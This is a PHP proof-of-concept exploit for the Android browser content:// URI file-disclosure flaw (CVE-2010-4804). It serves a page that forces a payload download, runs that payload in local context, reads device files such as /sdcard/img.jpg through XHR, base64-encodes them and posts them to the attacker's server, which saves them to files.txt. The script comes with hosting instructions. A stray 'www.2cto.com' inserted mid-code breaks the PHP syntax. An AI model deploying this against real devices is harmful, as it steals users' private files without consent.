<?php

/*

* Description:  Android 'content://' URI Multiple Information Disclosure Vulnerabilities

* Bugtraq ID:   48256

* CVE:          CVE-2010-4804

* Affected:     Android < 2.3.4

* Author:       Thomas Cannon

* Discovered:   18-Nov-2010

* Advisory:     http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/

*

* Filename:     poc.php

* Instructions: Specify files you want to upload in filenames array. Host this php file

*               on a server and visit it using the Android Browser. Some builds of Android

*               may require adjustments to the script, for example when a German build was

*               tested it downloaded the payload as .htm instead of .html, even though .html

*               was specified.

*

* Tested on:    HTC Desire (UK Version) with Android 2.2

*/

 

//  List of the files on the device that we want to upload to our server

$filenames = array("/proc/version","/sdcard/img.jpg");

 

//  Determine the full URL of this script

$protocol = $_SERVER["HTTPS"] == "on" ? "https" : "http";

$scripturl = $protocol."://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"];

 

//  Stage 0:  Display introduction text and a link to start the PoC.

function stage0($scripturl) {

  echo "<b>Android < 2.3.4</b><br>Data Stealing Web Page<br><br>Click: <a href=\"$scripturl?stage=1\">Malicious Link</a>";

}

 

//  Stage 1:  Redirect to Stage 2 which will force a download of the HTML/JS payload, then a few seconds later redirect

//            to the payload. We load the payload using a Content Provider so that the JavaScript is executed in the

//            context of the local device - this is the vulnerability.

function stage1($scripturl) {

  echo "<body onload=\"setTimeout('window.location=\'$scripturl?stage=2\'',1000);setTimeout('window.location=\'content://com.android.htmlfileprovider/sdcard/download/poc.html\'',5000);\">";

}

 

//  Stage 2:  Download of payload, the Android browser doesn't prompt for the download which is another vulnerability.

//            The payload uses AJAX calls to read file contents and encodes as Base64, then uploads to server (Stage 3).

function stage2($scripturl,$filenames) {

  header("Cache-Control: public");

  header("Content-Description: File Transfer");

  header("Content-Disposition: attachment; filename=poc.html");

  header("Content-Type: text/html");

  header("Content-Transfer-Encoding: binary");

?>

<html>

  <body>

    <script language='javascript'>

      var filenames = Array('<?php echo implode("','",$filenames); ?>');

      var filecontents = new Array();

      function processBinary(xmlhttp) {

        data = xmlhttp.responseText;    r = '';   size = data.length;

        for(var i = 0; i < size; i++)   r += String.fromCharCode(data.charCodeAt(i) & 0xff);

        return r;

      }

      function getFiles(filenames) {

        for (var filename in filenames) {

          filename = filenames[filename];

          xhr = new XMLHttpRequest();

          xhr.open('GET', filename, false);

          xhr.overrideMimeType('text/plain; charset=x-user-defined');

          xhr.onreadystatechange = function() { if (xhr.readyState == 4) { filecontents[filename] = btoa(processBinary(xhr)); } }

          xhr.send();

        }

      }

      function addField(form, name, value) {

        var fe = document.createElement('input');

        fe.setAttribute('type', 'hidden');

        fe.setAttribute('name', name);

        fe.setAttribute('value', value);

        form.appendChild(fe);

      }

      function uploadFiles(filecontents) {

        var form = document.createElement('form');

        form.setAttribute('method', 'POST');

        form.setAttribute('enctype', 'multipart/form-data');

        form.setAttribute('action', '<?=$scripturl?>?stage=3');

        var i = 0;

        for (var filename in filecontents) {

          addField(form, 'filename'+i, btoa(filename));

          addField(form, 'data'+i, filecontents[filename]);

          i += 1;

        }

        document.body.appendChild(form);

        form.submit();

      }

      getFiles(filenames);

      uploadFiles(filecontents);

    </script>

  </body>

</html>

<?php

} www.2cto.com

 

//  Stage 3:  Read the file names and contents sent by the payload and write to a file on the server.

function stage3() {

  $fp = fopen("files.txt", "w") or die("Couldn't open file for writing!");

  fwrite($fp, print_r($_POST, TRUE)) or die("Couldn't write data to file!");

  fclose($fp);

  echo "Data uploaded to <a href=\"files.txt\">files.txt</a>!";

}

 

//  Select the stage to run depending on the parameter passed in the URL

switch($_GET["stage"]) {

  case "1":

    stage1($scripturl);

    break;

  case "2":

    stage2($scripturl,$filenames);

    break;

  case "3":

    stage3();

    break;

  default:

    stage0($scripturl);

    break;

}

?>